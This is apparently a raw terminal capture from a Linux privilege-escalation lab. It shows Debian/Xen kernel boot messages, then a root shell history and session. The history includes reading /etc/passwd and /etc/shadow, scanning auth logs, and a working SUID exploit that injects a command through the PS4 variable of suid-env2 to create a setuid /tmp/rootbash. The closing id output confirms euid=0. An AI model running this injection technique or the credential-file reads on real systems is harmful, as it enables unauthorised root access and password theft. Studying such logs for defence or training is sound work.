2878Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
2879Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
2880Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
2881Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
2882Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
2883Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
2884Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
2885Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
2886Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
2887Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
2888Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
2889Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
2890Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
2891Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
2892Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
2893Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
2894Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
2895Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
2896Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
2897Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
2898Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
2899Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
2900Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
2901Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
2902Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
2903Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
2904Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
2905Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
2906Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
2907Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
2908Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
2909Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
2910Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
2911Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
2912Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
2913Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
2914Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
2915Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
2916Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
2917Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
2918Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
2919Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
2920Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
2921Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
2922Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
2923Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
2924Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
2925Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
2926Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
2927Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
2928Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
2929Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
2930Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
2931Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
2932Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
2933Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
2934Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
2935Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
2936Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
2937Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
2938Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
2939Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
2940Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
2941Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
2942Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
2943Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
2944Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
2945Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
2946Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
2947Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
2948Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
2949Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
2950Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
2951Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
2952Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
2953Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
2954Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
2955Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
2956Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
2957Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
2958Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
2959Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
2960Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
2961Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
2962Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
2963Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
2964Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
2965Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
2966Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
2967Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
2968Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
2969Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
2970Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
2971Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
2972Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
2973Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
2974Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
2975Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
2976Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
2977Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
2978Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
2979Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
2980Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
2981Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
2982Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
2983Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
2984Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
2985Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
2986Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
2987Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
2988Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
2989Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
2990Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
2991Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
2992Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
2993Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
2994Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
2995Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
2996Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
2997Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
2998Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
2999Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
3000Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
3001Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
3002Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
3003Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
3004Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
3005Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
3006Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
3007Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
3008Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
3009Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
3010Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
3011Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
3012Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
3013Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
3014Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
3015Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
3016Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
3017Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
3018Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
3019Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
3020Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
3021Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
3022Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
3023Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
3024Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
3025Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
3026Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
3027Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
3028Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
3029Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
3030Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
3031Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
3032Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
3033Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
3034Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
3035Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
3036Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
3037Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
3038Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
3039Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
3040Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
3041Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
3042Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
3043Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
3044Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
3045Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
3046Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
3047Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
3048Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
3049Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
3050Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
3051Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
3052Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
3053Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
3054Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
3055Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
3056Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
3057Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
3058Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
3059Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
3060Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
3061Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
3062Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
3063Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
3064Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
3065Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
3066Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
3067Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
3068Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
3069Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
3070Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
3071Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
3072Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
3073Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
3074Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
3075Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
3076Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
3077Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
3078Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
3079Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
3080Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
3081Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
3082Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
3083Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
3084Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
3085Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
3086Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
3087
3088
3089rootbash-4.1# history | tail -100
3090 115 ls
3091 116 cat /etc/hosts.allow
3092 117 arp -A
3093 118 arp
3094 119 arp -vpn
3095 120 arp -vn
3096 121 netstat -A
3097 122 netstat -r
3098 123 netstat -i
3099 124 netstat -g
3100 125 netstat -e
3101 126 netstat -l
3102 127 netstat
3103 128 man netstat
3104 129 netstat -tcp
3105 130 netstat -udp
3106 131 netstat -p tcp
3107 132 netstat -p udp
3108 133 netstat -p tcp 22
3109 134 netstat -p 22
3110 135 netstat -p 80
3111 136 netstat -p tcp
3112 137 netstat -p udp
3113 138 ls
3114 139 clear
3115 140 dmesg | grep /var/log
3116 141 dmesg | grep /var/log/messages.log
3117 142 cd /var/log
3118 143 ls
3119 144 dmesg | grep /var/log/syslog | less
3120 145 dmesg | grep /var/log/syslog | more
3121 146 dmesg | grep /var/log/syslog
3122 147 ls -la /var/log/syslog
3123 148 chmod 755 /var/log/syslog
3124 149 ls -la /var/log/syslog
3125 150 ls
3126 151 tail -f /var/log/syslog
3127 152 tail -f /var/log/syslog | more
3128 153 dmesg | grep /var/log/syslog > w0rd.txt
3129 154 cat w0rd.txt
3130 155 ls
3131 156 chmod 755 w0rd.txt
3132 157 ls
3133 158 cat w0rd.txt
3134 159 ls -la w0rd.txt
3135 160 rm -f w0rd.txt
3136 161 ls
3137 162 cat /var/log/syslog
3138 163 cat /var/log/syslog | less foo.txt
3139 164 cat /var/log/syslog | grep /usr/local/bin
3140 165 cat /var/log/syslog | grep /tmp
3141 166 cat /var/log/syslog | grep /rootbash
3142 167 ls
3143 168 cat /var/log/syslog
3144 169 ls
3145 170 dmesg /var/log/auth.log.2.gz
3146 171 cat /var/log/wtmp
3147 172 cat /var/run/utmp
3148 173 who am i
3149 174 users
3150 175 last
3151 176 finger
3152 177 cat /var/log/secure
3153 178 cat /var/log/auth.log
3154 179 head -5 /var/log/auth.log
3155 180 fc -l -10
3156 181 nano .bash_history
3157 182 history 100
3158 183 ls -la
3159 184 who am i
3160 185 cd /
3161 186 ls
3162 187 cd /home
3163 188 ls
3164 189 cd user/
3165 190 ls
3166 191 cd ..
3167 192 ls
3168 193 cat /etc/passwd
3169 194 cat /etc/shadow
3170 195 exit
3171 196 /usr/local/bin/suid-env2
3172 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
3173 198 /tmp/rootbash -p
3174 199 exit
3175 200 cls
3176 201 exit
3177 202 ls
3178 203 cd tools
3179 204 ls
3180 205 /tmp/rootbash -p
3181 206 exit
3182 207 su newroot
3183 208 whoami
3184 209 cat /etc/passwd
3185 210 su root
3186 211 exit
3187 212 tail -f /var/log/messages
3188 213 cat /var/log/messages
3189 214 history | tail -100
3190rootbash-4.1# id
3191uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
3192rootbash-4.1# whoami
3193root
3194rootbash-4.1# ls -la /home/user/bmillakid
3195rootbash-4.1# cd /home
3196rootbash-4.1# ls
3197user
3198rootbash-4.1# cd user
3199rootbash-4.1# ls
3200l33t.txt myvpn.ovpn tools
3201rootbash-4.1#
3202
3203
3204